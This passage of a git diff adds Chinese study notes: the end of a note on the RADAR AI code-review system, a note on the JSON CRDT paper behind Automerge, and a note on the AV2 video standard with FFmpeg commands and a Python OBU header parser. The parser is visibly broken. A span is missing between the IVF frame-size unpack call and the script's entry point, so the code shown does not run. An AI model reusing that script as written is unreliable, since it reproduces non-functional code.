一视同仁**。 + +- 确定性 codemod:信任最高(全量通过) +- 白名单 RACER runbook:信任中等(P50) +- 未白名单 AI 生成:信任较低(P20) +- 人类 diff:最严格(P5) + +## 八、总结 + +RADAR 解决了一个所有大规模工程团队都会遇到的问题:**当 AI 让代码生产速度翻倍时,人类审查能力跟不上怎么办?** + +它的核心答案是: + +1. **风险分级**:不是所有代码变更都一样危险 +2. **多层漏斗**:静态规则 + ML 评分 + LLM 审查 + 确定性验证 +3. **差异化信任**:不同来源的 diff 用不同的准入标准 +4. **渐进式部署**:安全优先,逐步放宽 + +最终成果:在 535K+ diff 的生产规模下,实现了 60.31% 的 approve 率,回退率仅为 1/3,线上事故率仅为 1/50,关闭时间减少了 330%。 + +--- + +## 九、我的思考 + +这篇论文最值得学习的点是**"分层过滤"**的设计思想。 + +第一层用最简单的静态规则快速过滤,第二层用 ML 模型做预测,第三层用 LLM 做深度理解,第四层用确定性验证做兜底。每一层都只解决自己能解决的部分问题,不试图用一个模型搞定一切。 + +这种思想在系统设计里很常见(比如 CDN -> 缓存 -> 后端),但把它应用到代码审查领域是一个很好的实践案例。 diff --git a/src/content/docs/papers/automerge-json-crdt-2017.md b/src/content/docs/papers/automerge-json-crdt-2017.md new file mode 100644 index 000000000..8c8a81fb2 --- /dev/null +++ b/src/content/docs/papers/automerge-json-crdt-2017.md @@ -0,0 +1,265 @@ +--- +title: A Conflict-Free Replicated JSON Datatype — 零基础学习笔记 +来源: https://arxiv.org/abs/1608.03960 +日期: 2026-06-13 +子分类: 编辑器与 IDE +分类: CLI +provenance: pipeline-v3 +--- + +## 日常类比:共享购物清单,而不是抢遥控器 + +你和室友维护同一份 JSON 购物清单:`{ "grocery": ["牛奶", "鸡蛋"] }`。你在地铁里离线加了一行「面包」,他在公司同时把 `grocery` 整个清空再写入「火腿」。传统「最后写入者赢」(Last Writer Wins)像**抢遥控器**:谁最后按保存,谁覆盖全场——另一个人的改动无声消失。 + +这篇 2017 年 IEEE TPDS 论文(作者 Martin Kleppmann、Alastair R. Beresford,arXiv 预印本 [1608.03960](https://arxiv.org/abs/1608.03960))提出的是另一种思路:**把合并规则写进数据结构本身**。每台设备本地随便改,改完把「操作」异步发给其他副本;网络可以乱序、重复、延迟,只要消息最终都能送达,所有副本会**自动收敛到同一棵 JSON 树**——这就是 CRDT(Conflict-Free Replicated Data Type,无冲突可复制数据类型)。 + +论文后来催生了 **Automerge** 库(Kleppmann 参与创建)。需要区分:Automerge 受这篇论文启发,但内部算法为性能做了大量改写;README 明确说与论文算法**并不相同**。学论文重在理解**嵌套 JSON 的 CRDT 语义**;写产品时再对照 [[yjs-crdt-overview]]、[[crdt-json]] 和 Automerge 文档。 + +## 论文解决什么问题 + +许多应用用 JSON 存状态:待办、通讯录、密码库、协同白板元数据。单机顺序修改语义清晰;**多副本并发修改**时却缺少通用答案: + +| 传统做法 | 问题 | +|----------|------| +| 数据库串行化 | 弱网/离线时应用几乎不可用 | +| Last Writer Wins | 并发写会**丢数据** | +| 弹窗让用户选 | 繁琐、易错 | +| 各应用自写合并逻辑 | 难证明正确、难复用 | + +论文贡献:给出**可嵌套任意深度**的 JSON CRDT——map、list、register 可组合;支持插入、删除、赋值;在客户端完成合并,**不依赖网络全序**;适合 P2P、端到端加密消息、移动弱网。附录证明**强最终一致性**(strong eventual consistency):副本间两两合并结果与合并顺序无关。 + +## JSON 数据模型(论文视角) + +论文把 JSON 看成一棵**可变树**: + +- **Map(对象)**:子节点无序;key 不可变,value 可变;可增删键。 +- **List(数组)**:子节点有**应用定义的顺序**;可插入、删除元素。 +- **Leaf(叶子)**:string / number / boolean / null;视为**不可变原语**,修改 = 给 register 赋新值。 + +与 XML 的关键区别:JSON 允许 **list 嵌在 map 里、map 嵌在 list 里**;XML 属性只能是标量,无法表达论文 Figure 3、Figure 5 那类「同一 key 下并发创建不同类型子树」的场景。 + +文本协同编辑在论文里很自然:把文档建模为**字符 list**,每次键入 = `insertAfter`,删除 = `delete`(见论文 Figure 4)。 + +## 三条设计原则 + +论文 Section 1.2 明确三条原则,后文所有奇怪合并行为都由此推导: + +1. **强最终一致性**:任意并发修改后,所有副本最终状态相同。 +2. **不丢用户输入**:并发写尽量都保留(与 LWW 对立)。 +3. **可交换性**:若一组更新按任意顺序串行执行结果相同,则并发执行也应相同。 + +## 架构:操作在本地产生,在网络上传播 + +```mermaid +flowchart LR + subgraph 设备P + PAPP[应用 / UI] + PCAP[命令 API] + POPS[操作队列] + PREP[本地副本 Ap] + PAPP --> PCAP + PCAP --> POPS + PCAP --> PREP + end + + subgraph 设备Q + QAPP[应用] + QCAP[命令 API] + QOPS[操作队列] + QREP[本地副本 Aq] + QAPP --> QCAP + QCAP --> QOPS + QCAP --> QREP + end + + POPS <-->|异步消息 可乱序| QOPS + POPS -->|apply| QREP + QOPS -->|apply| PREP +``` + +论文假设网络只保证**最终送达**(可重试),允许延迟、乱序、重复。没有中心服务器做 OT 变换;`yield` 命令模型化「把本地操作广播给其他副本」。 + +## 核心概念 + +### 1. 命令语言(Figure 7)——不是完整编程语言,是 CRDT 的「光标 API」 + +| 构造 | 含义 | +|------|------| +| `doc` | 文档根 | +| `expr.get(key)` | 进入 map 的某个 key | +| `expr.idx(i)` | 进入 list 的第 i 个元素;`idx(0)` = 表头虚拟位置 | +| `expr := value` | 给 register 赋值 | +| `expr.insertAfter(value)` | 在光标所指 list 元素**之后**插入 | +| `expr.delete` | 删除 map 键或 list 元素 | +| `let x = expr` | 保存**光标**(按元素身份,不是整数下标) | +| `expr.keys` / `expr.values` | 读 map 的键集 / register 的多值集合 | + +**光标按身份定位**:Figure 8 购物列表示例里,先 `insertAfter("eggs")` 得到变量 `eggs` 指向该元素;再在表头插入 `cheese` 后,`eggs` 的下标从 1 变成 2,但 `eggs.insertAfter("milk")` 仍插在 eggs **后面**——这对并发编辑至关重要(整数下标在并发插入时会漂移)。 + +### 2. Multi-Value Register(多值寄存器) + +两人同时写同一叶子字段: + +``` +p: doc.get("key") := "B" +q: doc.get("key") := "C" +合并后读: doc.get("key").values => {"B", "C"} +``` + +字符串无法自动「语义合并」,所以**两个值都保留**,由应用层决定展示策略(例如取最新时间戳、或让用户选)。这比 Cassandra 式 LWW 安全,因为不会静默丢弃一方输入。数字可换成 **counter CRDT**;可编辑字符串可换成 **字符 list CRDT**(Figure 4)。 + +### 3. 嵌套 Map 的「清空 vs 子键写入」(Figure 2) + +``` +p: 在 colors.red 写入 "#ff0000" +q: colors := {} 再 colors.green := "#00ff00" +``` + +若「高层覆盖总赢」,red 会被丢掉,违反原则 2。论文语义:**清空 map 会删掉当时存在的键(如 blue)**;但并发在子层新加的 red、green **仍保留**。行为与 Riak 嵌套 map CRDT 一致。 + +### 4. 同一 Map Key 的并发创建(Figure 3) + +两人都在离线状态下执行 `doc.get("grocery") := []` 并各自插入: + +``` +p: ["eggs", "ham"] +q: ["milk", "flour"] +合并: ["eggs", "ham", "milk", "flour"] (或另一合法全序,但所有副本一致) +``` + +两个 list **可自动合并**;各副本内部相对顺序保留(ham 紧跟 eggs)。跨副本谁先谁后论文允许任意但确定的选择。 + +### 5. 类型标签:mapT / listT / regT(Figure 5) + +同一 key 并发赋不同类型: + +``` +p: doc.get("a") := {} 再写 a.x := "y" → 嵌套 map +q: doc.get("a") := [] 再插入 "z" → list +``` + +map 与 list **无法语义合并**,于是 key `a` 下并存 `mapT("a")` 与 `listT("a")` 两个命名空间——读时要带类型。这是「不丢输入」与「单一 JSON 值」之间的诚实折中。 + +### 6. Ordered List CRDT(RGA 家族) + +论文 list 基于文献中的有序 list CRDT(如 RGA、LSEQ 等),每个插入操作带**唯一 id**,删除用 **tombstone** 标记而非物理抹除,以便并发 `insertAfter(已删元素)` 仍有锚点。Figure 4 展示了并发删 `b`、插 `x`/`y`/`z` 后所有字符都出现在最终文档中的合并结果。 + +### 7. 已知局限(Figure 6) + +Replica p 删除 todo 某项,Replica q 同时把该项 `done := true`。合并后可能出现**只有 `done: true`、没有 `title` 的幽灵项**——因为子字段更新与父 list 删除在不同层级并发,论文选择保留所有操作痕迹。作者指出:若应用有隐式 schema(todo 必有 title),可能需要 schema 感知的合并或丢弃一侧更新——**留给后续工作**。 + +## 代码示例 1:用论文命令语义手搓购物清单 + +下面用 JavaScript **模拟论文 Figure 8** 的命令序列(非 Automerge API,重在理解语义): + +```javascript +// 伪代码:每个 insertAfter 生成带唯一 opId 的操作,光标绑定 opId 而非下标 +const doc = makeEmptyJsonCrdt() + +let head = doc.get('shopping').idx(0) // 空 list 的表头 +head.insertAfter('eggs') +const eggs = doc.get('shopping').idx(1) // 光标指向 opId(eggs) + +head.insertAfter('cheese') // cheese 插到表头 +eggs.insertAfter('milk') // 仍插在 eggs 后,尽管 eggs 下标已变 + +console.log(doc.toJSON()) +// => { shopping: ['cheese', 'eggs', 'milk'] } +``` + +要点:**永远用稳定元素 id 当光标**,不要用「第 2 个下标」这种会在并发下失效的坐标。现代 Yjs `Y.Array`、Automerge 的 list 内部都遵循同一思想。 + +## 代码示例 2:双副本离线合并 multi-value register + +模拟 Figure 1:两设备并发改同一字段,再交换操作日志。 + +```javascript +// 简化教学模型:操作 = { lamport, replicaId, path, op, value } +function applyOps(state, ops) { + for (const op of [...ops].sort((a, b) => + a.lamport - b.lamport || a.replicaId.localeCompare(b.replicaId) + )) { + if (op.op === 'assign') { + const cell = state.getOrCreateRegister(op.path) + cell.add(op.value, op.lamport, op.replicaId) // multi-value:不覆盖,只追加并发写 + } + } + return state +} + +const opP = { lamport: 2, replicaId: 'p', path: ['key'], op: 'assign', value: 'B' } +const opQ = { lamport: 2, replicaId: 'q', path: ['key'], op: 'assign', value: 'C' } + +const replicaP = applyOps(emptyDoc({ key: 'A' }), [opP]) +const replicaQ = applyOps(emptyDoc({ key: 'A' }), [opQ]) + +// 交换:各应用对方全部操作 +const mergedOnP = applyOps(replicaP, [opQ]) +const mergedOnQ = applyOps(replicaQ, [opP]) + +console.log(mergedOnP.readRegister(['key'])) // Set { 'B', 'C' } +console.log(mergedOnQ.readRegister(['key'])) // Set { 'B', 'C' } — 与顺序无关 +``` + +真实 Automerge / 论文实现还会附带**因果依赖**(vector clock / dot clock),这里用 Lamport 时间戳 + replicaId 字典序做全序,足以说明「并发赋值 → 多值集合 → 副本一致」。 + +## 代码示例 3:用 Automerge 感受「JSON 式 CRDT」产品 API + +生产环境应使用 [Automerge](https://github.com/automerge/automerge)(算法与论文有差异,但体验最接近「可合并的 JSON」): + +```javascript +import * as Automerge from '@automerge/automerge' + +let docA = Automerge.init() +docA = Automerge.change(docA, d => { d.title = 'Hello A' }) + +let docB = Automerge.init() +docB = Automerge.change(docB, d => { d.title = 'Hello B' }) + +// 合并:无需中心服务器,顺序无关 +const merged1 = Automerge.merge(docA, docB) +const merged2 = Automerge.merge(docB, docA) +// merged1 与 merged2 深度相等 + +console.log(Automerge.getHistory(merged1).length) // 可审计每次 change +``` + +若同一字段并发写产生冲突,Automerge 会保留冲突信息供应用读取(具体 API 随版本演变);论文则用 multi-value register 在类型层面显式表达「多个并发值」。 + +## 与 OT、其他 CRDT 的对比 + +| 维度 | OT(Google Docs 类) | 平坦 CRDT(Riak 等) | 本篇 JSON CRDT | +|------|----------------------|----------------------|----------------| +| 嵌套 map+list | 需中心服务器(多数部署) | map 可嵌套,list 难与 JSON 对齐 | 任意嵌套 | +| 网络要求 | 常需全序广播 | 视类型而定 | 仅最终送达 | +| 离线编辑 | 困难 | 部分支持 | 原生支持 | +| 冲突语义 | 变换函数保证收敛 | 单类型成熟 | 组合证明 + multi-value | +| 字符串协同 | OT 主流 | 需字符 list | 建模为 list | + +## 适用场景 + +**适合**: + +- 离线优先笔记、待办、通讯录(原则 2:尽量不丢编辑) +- P2P 或 E2E 加密同步(无中心序) +- 需要 JSON 形状、又不想写 ad-hoc 合并的 local-first 应用 +- 研究嵌套 CRDT 组合与形式化语义 + +**不太适合**: + +- 银行账户、库存扣减等需要**全局不变式 + 拒绝并发**的领域(用事务 / 共识,不是 CRDT) +- 超大单字段频繁覆盖(multi-value 与元数据开销) +- 要求「并发写同一标量必须自动选一个赢家、且不能暴露多值」且不愿写应用策略的产品 + +## 读后带走的三句话 + +1. **JSON 协同难在嵌套**:不是 list CRDT 或 map CRDT 单独难,而是 map 里并发清空、子层并发写入、同 key 并发建不同类型子树——组合后仍要证明收敛。 +2. **不丢输入 ≠ 不制造尴尬状态**:Figure 6 的「无标题已完成 todo」说明 CRDT 语义诚实,schema 约束要额外一层。 +3. **论文是语义与证明,库是工程**:Automerge、Yjs、Loro 等在压缩、垃圾回收、字符串 CRDT 上走得更远;读论文建立「合并应发生什么」的直觉,读库解决「怎么快」。 + +## 延伸阅读 + +- 论文正式版:[IEEE TPDS 28(10), 2017](https://doi.org/10.1109/TPDS.2017.2697382),作者页 [Martin Kleppmann](https://martin.kleppmann.com/2017/04/24/json-crdt.html) +- 本书仓库:[[crdt-json]](同主题短笔记)、[[yjs-crdt-overview]](工业级 JS CRDT)、[[eg-walker-collab-text-2024]](文本 CRDT 新进展) +- 背景:Kleppmann《Designing Data-Intensive Applications》第 9 章(复制与一致性) +- 生态:[Automerge](https://automerge.org/)、[crdt.tech](https://crdt.tech/) diff --git a/src/content/docs/papers/av2-video-spec.md b/src/content/docs/papers/av2-video-spec.md new file mode 100644 index 000000000..d7723709f --- /dev/null +++ b/src/content/docs/papers/av2-video-spec.md @@ -0,0 +1,389 @@ +--- +title: AV2 Video Standard v1.0 — 下一代免版税视频编码零基础学习笔记 +来源: https://en.wikipedia.org/wiki/AV2 +日期: 2026-06-13 +子分类: 音视频媒体 +分类: 通信 +provenance: pipeline-v3 +--- + +## 从日常类比开始:行李箱打包术 2.0 + +想象你要把一整季衣服寄给远方的朋友。视频编码干的事,本质上就是**把巨大的原始画面「打包」成更小的包裹**,让对方收到后能**原样还原**。 + +- **未压缩视频**:每件衣服单独挂袋、塞满气泡膜——体积巨大,4K 一分钟就要好几 GB。 +- **有损编码**:允许「看起来一样就行」——T 恤叠成卷、袜子塞进鞋里,体积骤降,但肉眼看不出差别。 +- **AV1**(上一代):已经是很会打包的收纳达人了,YouTube、Netflix 都在用。 +- **AV2 v1.0**(2026 年 5 月定稿):同一套打包哲学,但换了更聪明的折叠法——同样画质下,包裹再小约 **30%**;或者同样码率下,画质更清晰。 + +日常里你关心的其实是:**网速够不够、手机烫不烫、流量贵不贵**。码率每降 30%,CDN 账单、5G 流量、视频会议卡顿都会跟着改善。AV2 就是 AOMedia(开放媒体联盟)写给全世界的「新一代打包标准说明书」——正式名称是 **AV2 Bitstream & Decoding Process Specification v1.0.0**。 + +一句话:**在 AV1 的免版税路线上,用更强的块划分、预测和变换工具,把流媒体、广播、会议、AR/VR 的视频再压一档。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 标准名称 | AV2 Bitstream & Decoding Process Specification | +| 版本 | **v1.0.0**(Final,2026-05-28 发布) | +| 制定组织 | [Alliance for Open Media (AOMedia)](https://aomedia.org/) | +| 许可模式 | 免版税(royalty-free patent policy) | +| 前身 | AV1(2018 定稿,艾美奖获奖编解码器) | +| 官方站点 | [av2.aomedia.org](https://av2.aomedia.org/) | +| 参考软件 | **AVM**(AOMedia Video Model,`libavm`,v1.0.0 tag) | +| 高性能解码器(进行中) | **dav2d**(VideoLAN 主导) | +| 典型收益 | 相同主观质量下,码率约比 AV1 低 **30%**(4K/8K/VR 等场景) | +| 主要竞品 | VVC/H.266(有专利池,压缩效率相近但授权复杂) | + +AV2 开发自 2020 年前后启动,历时五年余,在 2026 年 5 月 28 日与 AVM 1.0.0 参考实现一同正式发布,取代 2026 年 1 月的 working draft v13。 + +--- + +## 核心架构:混合编码框架(与 AV1 同族,工具全面换代) + +AV2 仍采用经典 **混合视频编码(Hybrid Video Coding)** 流水线——和 H.264、HEVC、AV1 同一套路,但每个环节都有新工具: + +```text +原始帧 → [可选去噪/FGS 分析] + → 块划分(Partition) + → 帧内/帧间预测(Intra / Inter Prediction) + → 变换 + 量化(Transform & Quantization) + → 熵编码(Entropy Coding,算术编码) + → 环路滤波(Deblock、CDEF、LR 等) + → 重建帧 → [可选胶片颗粒合成 Film Grain] + → OBU 比特流 +``` + +解码器做上述过程的逆操作。规范文档定义的是:**比特流语法(Syntax)**、**语义(Semantics)** 和 **解码过程(Decoding Process)**——编码器有自由度,但输出必须能被符合规范的解码器正确解码。 + +--- + +## 核心概念 1:OBU — 比特流的「快递单」 + +AV2 把所有数据装进 **Open Bitstream Unit(OBU,开放比特流单元)**。每个 OBU 像一封快递:有**头部**(类型、层级 ID、扩展标志)和**载荷**(实际视频数据)。 + +v1.0 中常见的 OBU 类型包括: + +| OBU 类型 | 作用 | +|----------|------| +| `OBU_SEQUENCE_HEADER` | 序列级参数:分辨率、色度格式、工具开关 | +| `OBU_TEMPORAL_DELIMITER` | 时间层边界标记 | +| `OBU_FRAME_HEADER` / Tile Group | 帧头与瓦片数据 | +| `OBU_MSDO` | Multi-Stream Decoder Operation — 多子码流资源分配 | +| `OBU_MULTI_FRAME_HEADER` | 多帧头(复合/多视角场景) | +| `OBU_LAYER_CONFIGURATION_RECORD` | 层级配置记录 | +| `OBU_ATLAS_SEGMENT` | Atlas 段信息(多视角/VR 相关) | +| `OBU_FILM_GRAIN` | 胶片颗粒参数(与 AV1 类似,可后处理合成) | +| `OBU_METADATA_*` | 元数据(HDR、内容解释等) | + +**多层设计**:OBU 头可为 1 字节(仅时间层 ID)或 2 字节(含扩展层/嵌入层 ID)。不需要空间可扩展时,可省掉额外 signaling 开销。 + +规范第 5、6 节可在 [Syntax Browser](https://av2.aomedia.org/v1.0.0/syntax_browser.html) 左右对照查阅——左边语法结构,右边语义解释,适合实现者速查。 + +--- + +## 核心概念 2:块划分 — 从「切蛋糕」到「乐高积木」 + +### 扩展递归划分(ERP, Extended Recursive Partitioning) + +- 超块(Superblock)最大可到 **256×256**(AV1 为 128×128;也可选用 128×128)。 +- 递归细分至最小 **4×4**。 +- 新增 **扩展分区类型**(extended partition types)、**四向不均匀划分**(4-way uneven partitions)等,让编码器对复杂边缘(头发丝、栏杆、文字边缘)更贴合。 + +### 半解耦划分(SDP, Semi-Decoupled Partitioning) + +AV1 里亮度(Y)和色度(U/V)**共用同一棵划分树**。AV2 的 SDP 允许: + +- 大块时:亮度/色度仍共享划分(省比特); +- 小块时(最大到 64×64):亮度与色度**独立划分**——色度边缘与亮度边缘不一致时(常见!)不再被迫绑死。 + +类比:AV1 是「三件套西装必须同码」;AV2 允许「上衣 M 码、裤子 S 码」,更合身。 + +### 变换块划分(Transform Partition) + +AV2 **移除了 AV1 的递归变换划分**,对方块和矩形变换块使用**统一的划分类型集合**,简化了解码器分支,同时配合新的变换集(TX sets)提升效率。 + +--- + +## 核心概念 3:帧内预测 — 用「已画好的邻居」猜当前块 + +帧内预测只参考**当前帧**已重建的像素。AV2 在 AV1 基础上新增/增强了大量模式: + +| 工具 | 含义(零基础版) | +|------|------------------| +| **MRLS** | 多参考行选择:不只用最靠边一行邻居,可在多条参考线里挑最准的 | +| **AIMC** | 自适应帧内模式编码:根据邻居块常用模式,给「热门模式」更短的码字 | +| **IBP** | 帧内双预测:两个方向预测加权混合,像「两个角度同时猜」 | +| **ORIP** | 基于偏移的预测精修:用邻域重建样本微调预测 | +| **DIP** | 数据驱动帧内预测:用预训练矩阵从降采样邻居生成预测 | +| **CfL / MHCCP** | 色度从亮度预测:利用 Y 与 UV 的相关性省码率 | +| **IBC** | 帧内块拷贝:屏幕内容(PPT、代码、游戏 UI)直接「复制已解码区域」;v1.0 可与环路滤波**同时使用**(AV1 受限更多) | +| **Palette** | 调色板模式:适合颜色种类少的图形/UI | + +屏幕共享、视频会议里的幻灯片,IBC + 改进的 SCC 工具是刚需;这也是 AV2 强调「更好处理 screen content」的原因。 + +--- + +## 核心概念 4:帧间预测 — 用「过去的帧」猜运动 + +帧间预测在参考帧里找匹配块(运动估计),AV2 增强包括: + +- **TIP**(Temporal Interpolation Prediction)等时域工具; +- **扩展 Warp / 仿射模型**; +- **BAWP**、改进的 **Wedge** 分区; +- **RefMVBank**、**AMVR/AMVD** 等运动矢量编码优化; +- 最多 **16** 个参考帧(`NUM_REF_FRAMES`)。 + +此外还有 **Bridge Frame**、**SEF** 等特殊帧类型,服务随机访问和多流场景。 + +--- + +## 核心概念 5:多流、多视角与可扩展性 + +现代应用不只要「一路 1080p」: + +- **多分屏 / 多角度体育**:一个比特流里塞多路节目,机顶盒按能力只解其中一路; +- **立体 / VR**:左右眼或多 Atlas 拼接; +- **可扩展层级**:最多 **8 个嵌入层 + 31 个扩展层**(embedded / extended layers),嵌入式层之间可预测。 + +**MSDO OBU**(Multi-Stream Decoder Operation)可在比特流级别声明:总解码资源如何在多个子码流间分配(例如 2/3 给主视角、各 1/9 给三个辅视角)。这让「一个文件、多种终端能力」变得可标准化,而不是各家私有 mux 方案。 + +--- + +## 核心概念 6:档次(Profile)与生态节奏 + +v1.0 覆盖主流 8/10/12 bit、4:2:0/4:2:2/4:4:4 等组合;AOMedia 已启动 **12-bit 专业电影 / HDR Profile** 的后续项目。容器方面,**ISO BMFF 的 AV2 binding** 规范也在推进中。 + +硬件节奏可参考 AV1 历史: + +- AV1 规范:2018 年 3 月; +- 首批消费级硬解:约 2020 年(Intel Tiger Lake、NVIDIA RTX 30、AMD RX 6000); +- 硬编普及:约 2022 年。 + +AV2 很可能也要 **2–4 年** 才能在大规模消费硬件上铺开;2026 年 CES 上 VideoLAN 已用 **VLC 4.0 + dav2d** 在 MacBook Pro 上演示 AV2 软解。 + +--- + +## 代码示例 1:用 FFmpeg 探测 AV2 比特流(生态接入) + +FFmpeg 对 AV2 的支持随版本快速演进。定稿后典型工作流与 AV1 类似,只是 codec 名换成 `libav2` / `av2`(具体以你本地 `ffmpeg -codecs` 为准): + +```bash +# 查看本机是否已注册 AV2 解码器/编码器 +ffmpeg -hide_banner -codecs 2>/dev/null | rg -i 'av2|avm' + +# 将原始 YUV 用 AVM 参考编码器压缩(示例参数,需已编译 --enable-libavm) +ffmpeg -f rawvideo -pix_fmt yuv420p -s 1920x1080 -r 30 -i input.yuv \ + -c:v libaom-av2 -cpu-used 6 -crf 32 -b:v 0 \ + -tiles 2x2 -row-mt 1 \ + output.av2.ivf + +# 软解码并导出为 PNG 帧(验证解码器 conformance) +ffmpeg -c:v libdav2d -i output.av2.ivf -frames:v 1 preview.png + +# 用 ffprobe 查看流级元数据(codec_name、profile、level、像素格式) +ffprobe -v quiet -show_streams -select_streams v:0 output.av2.ivf +``` + +若 `libaom-av2` / `libdav2d` 尚未安装,可从 [AVM](https://gitlab.com/AOMediaCodec/avm) 与 [dav2d](https://code.videolan.org/videolan/dav2d) 源码构建,再链接进 FFmpeg。 + +**实践提示**:早期参考编码器 `cpu-used` 越大越快但效率越差;`-crf` 与 `-b:v` 二选一控制质量/码率,和 x264/AV1 习惯一致。 + +--- + +## 代码示例 2:解析 OBU 头部(教学用 Python) + +下面脚本演示如何从 IVF 封装的 AV2 裸流中**逐个读取 OBU 头**(简化版,仅用于理解规范 §5.3 的头部语法;生产环境请用 `libavm` 或 FFmpeg): + +```python +#!/usr/bin/env python3 +"""Minimal AV2 OBU header walker — educational only.""" +from __future__ import annotations +import struct +import sys + +# OBU type names from AV2 spec (subset) +OBU_NAMES = { + 1: "OBU_SEQUENCE_HEADER", + 2: "OBU_TEMPORAL_DELIMITER", + 3: "OBU_FRAME_HEADER", + 4: "OBU_TILE_GROUP", + 5: "OBU_METADATA", + 6: "OBU_FRAME", + 7: "OBU_REDUNDANT_FRAME_HEADER", + 8: "OBU_TILE_LIST", + 15: "OBU_PADDING", + # v1.0 extended types include MSDO, MULTI_FRAME_HEADER, etc. +} + +def leb128_read(buf: bytes, pos: int) -> tuple[int, int]: + """Read AOM-style LEB128 size field.""" + value, shift = 0, 0 + while pos < len(buf): + b = buf[pos] + pos += 1 + value |= (b & 0x7F) << shift + if not (b & 0x80): + return value, pos + shift += 7 + raise ValueError("truncated LEB128") + +def parse_obu_header(data: bytes, pos: int = 0) -> dict: + if pos >= len(data): + raise EOFError + b0 = data[pos] + pos += 1 + obu_type = (b0 >> 3) & 0x0F + extension = bool(b0 & 0x04) + has_size = bool(b0 & 0x02) + obu_tlayer_id = b0 & 0x01 # simplified; v1.0 has extended header paths + + header = { + "obu_type": obu_type, + "name": OBU_NAMES.get(obu_type, f"OBU_TYPE_{obu_type}"), + "extension": extension, + "has_size": has_size, + } + + if extension: + b1 = data[pos] + pos += 1 + header["obu_xlayer_id"] = b1 >> 4 + header["obu_mlayer_id"] = b1 & 0x0F + + payload_size = None + if has_size: + payload_size, pos = leb128_read(data, pos) + header["payload_size"] = payload_size + + header["header_end"] = pos + if payload_size is not None: + header["payload_end"] = pos + payload_size + return header + +def walk_obus(av2_payload: bytes, limit: int = 20) -> None: + pos = 0 + for i in range(limit): + if pos >= len(av2_payload): + break + h = parse_obu_header(av2_payload, pos) + print(f"[{i:02d}] {h['name']:28s} ext={h['extension']} " + f"size={h.get('payload_size', '?')}") + pos = h.get("payload_end", h["header_end"]) + +def strip_ivf(path: str) -> bytes: + """IVF: 32-byte file header + per-frame 12-byte header.""" + with open(path, "rb") as f: + magic = f.read(4) + if magic != b"DKIF": + return f.read() # assume raw OBU stream + f.read(28) # rest of IVF file header + chunks = [] + while True: + hdr = f.read(12) + if len(hdr) < 12: + break + size = struct.unpack(" 1 else "sample.av2.ivf" + walk_obus(strip_ivf(path)) +``` + +运行后你会看到比特流是一串 `SEQUENCE_HEADER → FRAME_HEADER → TILE_GROUP → …` 的 OBU 链——这正是播放器 demuxer 交给解码器的第一道工序。 + +--- + +## 代码示例 3:用 AVM 参考编码器做质量/码率扫点 + +做 codec 评估时,常用 **CRF 扫点**或 **固定 QP** 画 BD-Rate 曲线: + +```bash +# 假设已安装 avmenc / avmdec(AVM 构建产物) +for crf in 20 28 36 44; do + avmenc --codec=av2 -w 1920 -h 1080 --fps=30/1 --limit=300 \ + --cq-level=$crf --end-usage=q -o "out_${crf}.ivf" input.yuv + avmdec -o /dev/null "out_${crf}.ivf" # 验证可解码 +done + +# 用 vmaf / ssimulacra2 对比源与重建(需 ffmpeg 滤镜或独立工具) +ffmpeg -s 1920x1080 -pix_fmt yuv420p -i input.yuv -i decoded.yuv \ + -lavfi "[0:v][1:v]libvmaf=log_fmt=json:log_path=vmaf.json" -f null - +``` + +论文与 AOMedia 技术幻灯片(如 Andrey Norkin 的架构概述)报告:随机接入(random access)配置下,AV2 相对 AV1 约 **30%** 码率节省——你的实测会随内容类型(动画、体育、屏幕共享)大幅波动。 + +--- + +## AV2 vs AV1 vs VVC:怎么选? + +| 维度 | AV1 | AV2 v1.0 | VVC (H.266) | +|------|-----|----------|-------------| +| 专利 | 免版税 | 免版税 | 专利池(MC-IF、Sisvel 等) | +| 相对 HEVC 效率 | 基准一代 | 再省 ~30%(相对 AV1) | 与 AV2 大致同级 | +| 硬件普及(2026) | 已广泛 | 刚起步(软解为主) | 部分广播/高端设备 | +| 多流/VR | 基础 | 显著增强(MSDO、Atlas) | 有类似工具 | +| 屏幕内容 | 好 | 更好(IBC+滤波协同) | 好 | +| 实现复杂度 | 高 | 更高 | 最高 | + +**选型建议**: + +- **现在就要全平台硬解**:继续 AV1/HEVC,AV2 等待硬件。 +- **长视频平台/CDN 降本**:开始软解试点 + 云端转码实验,跟踪 GPU IP 路线图。 +- **专利敏感场景**(浏览器、开源播放器、初创公司):AV2 比 VVC 更友好。 +- **广播/机顶盒既有 VVC 授权**:可能双轨并存,类似当年 HEVC vs AV1。 + +注意:即使 AOMedia 声明免版税,第三方专利池(如 Sisvel 针对 AV1/AV2 的声明)在 2025–2026 年已是行业现实——上线前需做法务与 FTO(自由实施)评估,不能只看「royalty-free」四个字。 + +--- + +## 如何阅读 v1.0 规范(学习路径) + +1. **先读概述**:§1 Scope、§2 Terms、§3 Decoder model — 建立「解码器必须做什么」的全局图。 +2. **对照 Syntax Browser**:§5 Syntax + §6 Semantics,从 `sequence_header_obu()` 追起。 +3. **看参考代码**:AVM 的 `avmdec` / `avmenc` 与 §9 附加表(C header 查找表)交叉验证。 +4. **跑 conformance streams**:AOMedia 与 Allegro、HDR Nova 等提供的商用一致性码流包。 +5. **扩展阅读**:[Wikipedia AV2](https://en.wikipedia.org/wiki/AV2)、[Norkin AV2 架构概述](https://norkin.org/research/av2_overview/index.html)、AOMedia 新闻稿。 + +规范是 **Final Deliverable**(2026-05-28),working draft v13 已废止;实现请以 **v1.0.0** 为准。 + +--- + +## 踩过的坑(早期实现者经验) + +1. **把 v13 草稿当最终版**:v13 与 v1.0 在 OBU 扩展头、xlayer 上下文保存等细节上有差异,迁移时务必 diff 语法浏览器。 +2. **忽略 Operating Point**:多层级比特流里,`OperatingPointIdc` 决定当前解码器实例看哪些层;demuxer 丢 OBU 会导致「能解但花屏」。 +3. **IBC 与环路滤波顺序**:v1.0 允许 IBC 与 in-loop filter 协同,照搬 AV1「先 IBC 后滤波」的旧假设会编出 non-conformant 流。 +4. **只用 PSNR 评估**:AV2 的低码率工具集强烈依赖感知优化,应用 **VMAF / SSIMULACRA2** 或主观测试。 +5. **低估解码复杂度**:ERP + 大超块 + 多参考帧对嵌入式不友好;MSDO 资源分配是为「机顶盒只解一路」设计的,移动端仍可能需要转码。 + +--- + +## 小结 + +| 要点 | 一句话 | +|------|--------| +| 定位 | AV1 正统续作,免版税,2026-05-28 定稿 v1.0.0 | +| 收益 | 同画质码率约 ↓30%,更适合流媒体/会议/VR | +| 比特流 | OBU 容器;支持多流、多层级、Atlas | +| 关键技术 | ERP、SDP、增强 intra/inter、改进 IBC/SCC | +| 软件 | AVM 